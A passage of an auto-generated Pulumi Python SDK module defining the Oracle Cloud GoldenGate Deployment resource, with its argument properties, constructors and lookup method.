:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] deployment_url: The URL of a resource.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[bool] is_healthy: True if all of the aggregate resources are working correctly.
:param pulumi.Input[bool] is_latest_version: Indicates if the resource is the the latest available version.
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
:param pulumi.Input[str] lifecycle_details: Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input['DeploymentOggDataArgs'] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
:param pulumi.Input[str] private_ip_address: The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
:param pulumi.Input[str] public_ip_address: The public IP address representing the access point for the Deployment.
:param pulumi.Input[str] state: Possible lifecycle states.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
:param pulumi.Input[Mapping[str, Any]] system_tags: The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
:param pulumi.Input[str] time_created: The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
:param pulumi.Input[str] time_updated: The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if cpu_core_count is not None:
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deployment_backup_id is not None:
pulumi.set(__self__, "deployment_backup_id", deployment_backup_id)
if deployment_type is not None:
pulumi.set(__self__, "deployment_type", deployment_type)
if deployment_url is not None:
pulumi.set(__self__, "deployment_url", deployment_url)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if is_auto_scaling_enabled is not None:
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
if is_healthy is not None:
pulumi.set(__self__, "is_healthy", is_healthy)
if is_latest_version is not None:
pulumi.set(__self__, "is_latest_version", is_latest_version)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if license_model is not None:
pulumi.set(__self__, "license_model", license_model)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ogg_data is not None:
pulumi.set(__self__, "ogg_data", ogg_data)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if public_ip_address is not None:
pulumi.set(__self__, "public_ip_address", public_ip_address)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if system_tags is not None:
pulumi.set(__self__, "system_tags", system_tags)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The Minimum number of OCPUs to be made available for this Deployment.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deploymentBackupId")
def deployment_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
"""
return pulumi.get(self, "deployment_backup_id")
@deployment_backup_id.setter
def deployment_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_backup_id", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> Optional[pulumi.Input[str]]:
"""
The deployment type.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="deploymentUrl")
def deployment_url(self) -> Optional[pulumi.Input[str]]:
"""
The URL of a resource.
"""
return pulumi.get(self, "deployment_url")
@deployment_url.setter
def deployment_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_url", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Metadata about this specific object.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) An object's Display Name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="isHealthy")
def is_healthy(self) -> Optional[pulumi.Input[bool]]:
"""
True if all of the aggregate resources are working correctly.
"""
return pulumi.get(self, "is_healthy")
@is_healthy.setter
def is_healthy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_healthy", value)
@property
@pulumi.getter(name="isLatestVersion")
def is_latest_version(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if the resource is the the latest available version.
"""
return pulumi.get(self, "is_latest_version")
@is_latest_version.setter
def is_latest_version(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_latest_version", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True if this object is publicly available.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Oracle license model that applies to a Deployment.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="oggData")
def ogg_data(self) -> Optional[pulumi.Input['DeploymentOggDataArgs']]:
"""
(Updatable) Deployment Data for creating an OggDeployment
"""
return pulumi.get(self, "ogg_data")
@ogg_data.setter
def ogg_data(self, value: Optional[pulumi.Input['DeploymentOggDataArgs']]):
pulumi.set(self, "ogg_data", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="publicIpAddress")
def public_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The public IP address representing the access point for the Deployment.
"""
return pulumi.get(self, "public_ip_address")
@public_ip_address.setter
def public_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_ip_address", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
Possible lifecycle states.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
"""
return pulumi.get(self, "system_tags")
@system_tags.setter
def system_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "system_tags", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
class Deployment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Deployment resource in Oracle Cloud Infrastructure Golden Gate service.
Creates a new Deployment.
## Import
Deployments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:goldengate/deployment:Deployment test_deployment "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeploymentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Deployment resource in Oracle Cloud Infrastructure Golden Gate service.
Creates a new Deployment.
## Import
Deployments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:goldengate/deployment:Deployment test_deployment "id"
```
:param str resource_name: The name of the resource.
:param DeploymentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeploymentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeploymentArgs.__new__(DeploymentArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
if cpu_core_count is None and not opts.urn:
raise TypeError("Missing required property 'cpu_core_count'")
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deployment_backup_id"] = deployment_backup_id
if deployment_type is None and not opts.urn:
raise TypeError("Missing required property 'deployment_type'")
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["description"] = description
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["freeform_tags"] = freeform_tags
if is_auto_scaling_enabled is None and not opts.urn:
raise TypeError("Missing required property 'is_auto_scaling_enabled'")
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_public"] = is_public
if license_model is None and not opts.urn:
raise TypeError("Missing required property 'license_model'")
__props__.__dict__["license_model"] = license_model
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ogg_data"] = ogg_data
if subnet_id is None and not opts.urn:
raise TypeError("Missing required property 'subnet_id'")
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["deployment_url"] = None
__props__.__dict__["is_healthy"] = None
__props__.__dict__["is_latest_version"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["private_ip_address"] = None
__props__.__dict__["public_ip_address"] = None
__props__.__dict__["state"] = None
__props__.__dict__["system_tags"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
super(Deployment, __self__).__init__(
'oci:goldengate/deployment:Deployment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
deployment_url: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_healthy: Optional[pulumi.Input[bool]] = None,
is_latest_version: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
public_ip_address: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None) -> 'Deployment':
"""
Get an existing Deployment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] deployment_url: The URL of a resource.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[bool] is_healthy: True if all of the aggregate resources are working correctly.
:param pulumi.Input[bool] is_latest_version: Indicates if the resource is the the latest available version.
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
:param pulumi.Input[str] lifecycle_details: Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
:param pulumi.Input[str] private_ip_address: The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
:param pulumi.Input[str] public_ip_address: The public IP address representing the access point for the Deployment.
:param pulumi.Input[str] state: Possible lifecycle states.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
:param pulumi.Input[Mapping[str, Any]] system_tags: The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
:param pulumi.Input[str] time_created: The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
:param pulumi.Input[str] time_updated: The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeploymentState.__new__(_DeploymentState)
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deployment_backup_id"] = deployment_backup_id
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["deployment_url"] = deployment_url
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_healthy"] = is_healthy
__props__.__dict__["is_latest_version"] = is_latest_version
__props__.__dict__["is_public"] = is_public
__props__.__dict__["license_model"] = license_model
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ogg_data"] = ogg_data
__props__.__dict__["private_ip_address"] = private_ip_address
__props__.__dict__["public_ip_address"] = public_ip_address
__props__.__dict__["state"] = state
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["system_tags"] = system_tags
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
return Deployment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> pulumi.Output[int]:
"""
(Updatable) The Minimum number of OCPUs to be made available for this Deployment.
"""
return pulumi.get(self, "cpu_core_count")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="deploymentBackupId")
def deployment_backup_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
"""
return pulumi.get(self, "deployment_backup_id")
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Output[str]:
"""
The deployment type.
"""
return pulumi.get(self, "deployment_type")
@property
@pulumi.getter(name="deploymentUrl")
def deployment_url(self) -> pulumi.Output[str]:
"""
The URL of a resource.
"""
return pulumi.get(self, "deployment_url")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
(Updatable) Metadata about this specific object.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) An object's Display Name.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[str]:
"""
(Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@property
@pulumi.getter(name="isHealthy")
def is_healthy(self) -> pulumi.Output[bool]:
"""
True if all of the aggregate resources are working correctly.
"""
return pulumi.get(self, "is_healthy")
@property
@pulumi.getter(name="isLatestVersion")
def is_latest_version(self) -> pulumi.Output[bool]:
"""
Indicates if the resource is the the latest available version.
"""
return pulumi.get(self, "is_latest_version")
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> pulumi.Output[bool]:
"""
(Updatable) True if this object is publicly available.
"""
return pulumi.get(self, "is_public")
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> pulumi.Output[str]:
"""
(Updatable) The Oracle license model that applies to a Deployment.
"""
return pulumi.get(self, "license_model")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
"""
